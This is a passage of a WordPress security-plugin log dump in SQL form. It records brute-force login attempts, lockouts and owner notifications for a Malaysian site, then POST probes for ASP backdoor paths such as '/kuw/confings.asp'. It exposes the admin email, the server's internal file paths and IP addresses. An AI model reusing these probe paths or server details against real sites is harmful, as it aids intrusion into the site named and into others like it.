11:51:49',17796240,19286216,'https://bintara.com.my/blog/wp-login.php',1,0,'5.196.118.54'),(25787,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:51:49\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:51:49\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:06:49\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:06:49\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:51:50','2019-09-21 11:51:49',17880880,19286216,'https://bintara.com.my/blog/wp-login.php',1,0,'5.196.118.54'),(25788,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:51:50','2019-09-21 11:51:49',18086584,19286216,'https://bintara.com.my/blog/wp-login.php',1,0,'5.196.118.54'),(25789,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYO4rfBTP0kPOVnb8jrBQAAAFU\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"120.79.15.181\";s:11:\"REMOTE_PORT\";s:5:\"35488\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYO4rfBTP0kPOVnb8jrBQAAAFU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066723.0205\";s:12:\"REQUEST_TIME\";s:10:\"1569066723\";}}','notice','2019-09-21 11:52:04','2019-09-21 11:52:03',17798320,19287504,'https://bintara.com.my/wp/wp-login.php',1,0,'120.79.15.181'),(25790,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:52:03\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:52:03\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:07:03\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:07:03\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:52:04','2019-09-21 11:52:03',17883184,19287504,'https://bintara.com.my/wp/wp-login.php',1,0,'120.79.15.181'),(25791,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:52:04','2019-09-21 11:52:03',18088808,19287504,'https://bintara.com.my/wp/wp-login.php',1,0,'120.79.15.181'),(25792,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYO8XkXpgmG5P@iB8keogAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"82.196.3.212\";s:11:\"REMOTE_PORT\";s:5:\"53038\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYO8XkXpgmG5P@iB8keogAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066737.3798\";s:12:\"REQUEST_TIME\";s:10:\"1569066737\";}}','notice','2019-09-21 11:52:18','2019-09-21 11:52:17',17796240,19286216,'https://bintara.com.my/2019/wp-login.php',1,0,'82.196.3.212'),(25793,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:52:17\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:52:17\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:07:17\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:07:17\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:52:18','2019-09-21 11:52:17',17880880,19286216,'https://bintara.com.my/2019/wp-login.php',1,0,'82.196.3.212'),(25794,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:52:18','2019-09-21 11:52:17',18086584,19286216,'https://bintara.com.my/2019/wp-login.php',1,0,'82.196.3.212'),(25795,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYPOXkXpgmG5P@iB8kfFAAAAJA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.141.147\";s:11:\"REMOTE_PORT\";s:5:\"44846\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYPOXkXpgmG5P@iB8kfFAAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066809.1423\";s:12:\"REQUEST_TIME\";s:10:\"1569066809\";}}','notice','2019-09-21 11:53:30','2019-09-21 11:53:29',17798720,19290800,'https://bintara.com.my/wp/wp-login.php',1,0,'132.148.141.147'),(25796,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:53:29\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:53:29\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:08:29\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:08:29\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:53:30','2019-09-21 11:53:29',17883360,19290800,'https://bintara.com.my/wp/wp-login.php',1,0,'132.148.141.147'),(25797,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:53:30','2019-09-21 11:53:29',18089184,19290800,'https://bintara.com.my/wp/wp-login.php',1,0,'132.148.141.147'),(25798,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYhdViJ7D9Gn7wDPh8gLwAAAME\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"89.221.250.18\";s:11:\"REMOTE_PORT\";s:5:\"56370\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYhdViJ7D9Gn7wDPh8gLwAAAME\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071477.6606\";s:12:\"REQUEST_TIME\";s:10:\"1569071477\";}}','notice','2019-09-21 13:11:19','2019-09-21 13:11:18',17798576,19290168,'https://bintara.com.my/2019/wp-login.php',1,0,'89.221.250.18'),(28954,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//inc/AspCms_AdvJs.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"218.26.126.173\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"218.26.126.173\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/inc/AspCms_AdvJs.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG26Eq-QPicCh3WFsYfmAAAAII\";s:12:\"REDIRECT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56595\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/inc/AspCms_AdvJs.asp\";s:10:\"SCRIPT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG26Eq-QPicCh3WFsYfmAAAAII\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571927784.863\";s:12:\"REQUEST_TIME\";s:10:\"1571927784\";}}','notice','2019-10-24 14:36:26','2019-10-24 14:36:25',35340920,37136408,'http://bintara.com.my//inc/AspCms_AdvJs.asp',1,0,'218.26.126.173'),(28953,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//kuw/confings.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"687\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"61.161.26.81\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"61.161.26.81\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/kuw/confings.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/kuw/confings.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG21-5cHc@dX2BdZ47FMAAAAAk\";s:12:\"REDIRECT_URL\";s:17:\"/kuw/confings.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56214\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/kuw/confings.asp\";s:10:\"SCRIPT_URL\";s:17:\"/kuw/confings.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG21-5cHc@dX2BdZ47FMAAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927767.9106\";s:12:\"REQUEST_TIME\";s:10:\"1571927767\";}}','notice','2019-10-24 14:36:09','2019-10-24 14:36:08',35271568,37068976,'http://bintara.com.my//kuw/confings.asp',1,0,'61.161.26.81'),(28952,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//kuw/confings.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"822\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"121.55.52.169\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"121.55.52.169\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/kuw/confings.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/kuw/confings.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG2ze0MT698oQwhBK9epAAAARA\";s:12:\"REDIRECT_URL\";s:17:\"/kuw/confings.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55436\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/kuw/confings.asp\";s:10:\"SCRIPT_URL\";s:17:\"/kuw/confings.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"w